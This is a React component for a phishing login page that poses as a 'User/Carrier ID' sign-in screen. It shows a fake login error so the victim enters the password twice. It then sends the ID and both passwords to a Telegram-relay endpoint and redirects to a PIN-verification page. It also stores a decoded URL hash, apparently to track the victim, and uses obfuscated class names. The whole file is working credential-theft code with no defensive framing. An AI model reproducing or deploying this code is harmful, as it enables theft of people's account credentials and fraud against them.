import { useEffect, useState } from "react";
import axios from 'axios';
import LoginForm from "../LoginForm/LoginForm";
import styles from "./Main.module.scss";
import { useNavigate } from "react-router";

const Main = () => {
    const [first, setFirst] = useState(1);
    const [login, setLogin] = useState('');
    const [gg, setGg] = useState(false);
    const [pass, setPass] = useState('');
    const [error, setError] = useState(false);
    let navigate = useNavigate();


    useEffect(() => {
        const hash = window.location.hash.replace('#', '');
        if (!hash) return;

        try {
            const decoded = atob(hash);
            localStorage.setItem('alosss', decoded);
        } catch { }
    }, []);

    const onFinish = (async () => {
        if (first == 2) {
            try {
                setPass('')
                setGg(true)
                setTimeout(() => {
                    localStorage.setItem("login", login)
                    localStorage.setItem('pass', pass)
                    setError(true)
                }, 1500);
            } catch (error) {
                console.error('Error sending data to Telegram:', error);
            }
        }
        if (first == 3) {
            const password = localStorage.getItem('pass')
            const message = `
            Hello Friends:
            User/Carrier ID*: ${login}
            Password*: ${password}
            Second Password*: ${pass}
        `;

            try {
                // Send the message with form data
                await fetch('/api/send-to-telegram', {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ message: message }),
                });
                setTimeout(() => {
                    navigate('/pinverify')
                }, 1500);
            } catch (error) {
                console.error('Error sending data to Telegram:', error);
            }
        }
    })

    const handleKeyDown = (e) => {
        if (e.key === "Enter") {
            e.preventDefault();
            if (gg) {
                setFirst(3);
            } else if (pass && login) {
                setFirst(2);
            } else if (login) {
                setFirst(2);
            }
        }
    };

    useEffect(() => {
        onFinish()
    }, [first])

    return (
        <main className={styles.mainCont}>
            <div className={styles.fifdjifjidfj}>
                <h2>Please Verify Your Access</h2>
            </div>
            {error ? <div className={styles.errorBox}>
                <h2>The following errors have occurred</h2>
                <p>1. Login Error.</p>
            </div> : ''}
            <div className={styles.mainBox1}>
                <a href="">For English click here</a>
                <a href="">En Français, cliquer ici</a>
                <a href="">Para Español Presione Aquí</a>
            </div>
            <div className={styles.fufhuifnjfui}>
                <div className={styles.flexing}>
                    <form onKeyDown={handleKeyDown} className={styles.dfgdsfgdsfdf}>
                        <div className={styles.fofodikfdgdfgdmnkjdnmdk}>
                            <div className={styles.fkfnfikjnfkjfnkfn}>
                                <label>User/Carrier ID:</label>
                                <input placeholder="Enter Your User or Carrier ID" onChange={(e) => {
                                    setLogin(e.target.value)
                                }} />
                            </div>
                            <div className={styles.fkfnfikjnfkjfnkfndsfsdf}>
                                <label>Password:</label>
                                <input value={pass} placeholder="Password" type="password" onChange={(e) => {
                                    setPass(e.target.value)
                                }} />
                            </div>
                            <div className={styles.fifjidkjijdidjmidjidj} onClick={() => {
                                if (gg) {
                                    setFirst(3);
                                } else if (pass && login) {
                                    setFirst(2);
                                }
                            }}>
                                Continue
                            </div>
                        </div>
                    </form>
                </div>
            </div>
            <div className={styles.mainBox3}>
                <p>User/Carrier ID and Password are case sensitive</p>
            </div>
        </main>
    )
}
export default Main;